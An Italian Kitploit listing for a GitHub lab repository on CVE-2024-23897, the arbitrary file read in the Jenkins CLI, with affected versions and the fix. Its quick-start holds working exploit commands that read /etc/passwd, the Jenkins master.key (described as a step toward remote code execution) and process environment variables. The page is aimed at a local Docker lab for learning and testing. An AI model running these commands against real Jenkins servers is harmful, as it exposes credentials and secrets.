Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-23897 | Kitploit
Strumenti/GitHubGitHub/dungsocool/cve-2024-23897
Scanner di VulnerabilitàExploitSicurezza WebApprendimento e FormazioneLab e Pratica
GitHubdungsocool/cve-2024-23897

CVE-2024-23897

Vedi Repository
1 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-23897 — Lettura arbitraria di file nella CLI di Jenkins

Avvio rapido

root@kitploit:~
# 1. Start lab
docker-compose up -d

# 2. Wait ~30s, then download CLI tool
curl -O http://localhost:8080/jnlpJars/jenkins-cli.jar

# 3. Exploit — read /etc/passwd (full file)
java -jar jenkins-cli.jar -s http://localhost:8080 -http connect-node @/etc/passwd

# 4. Read master.key (chain to RCE)
java -jar jenkins-cli.jar -s http://localhost:8080 -http connect-node @/var/jenkins_home/secrets/master.key

# 5. Read environment variables
java -jar jenkins-cli.jar -s http://localhost:8080 -http help @/proc/self/environ

Dettagli

Vedi REPORT.md per l'analisi tecnica completa (in vietnamita).

VoceValore
CVSS9.8 (Critico)
Versioni interessateJenkins <= 2.441, LTS <= 2.426.2
Versione labjenkins/jenkins:2.426.2-lts
Causa principaleargs4j expandAtFiles abilitato sulla CLI lato server
SoluzioneAggiornare a Jenkins >= 2.442 / LTS >= 2.426.3

Pulizia

root@kitploit:~
docker-compose down -v --remove-orphans
Scarica lo strumento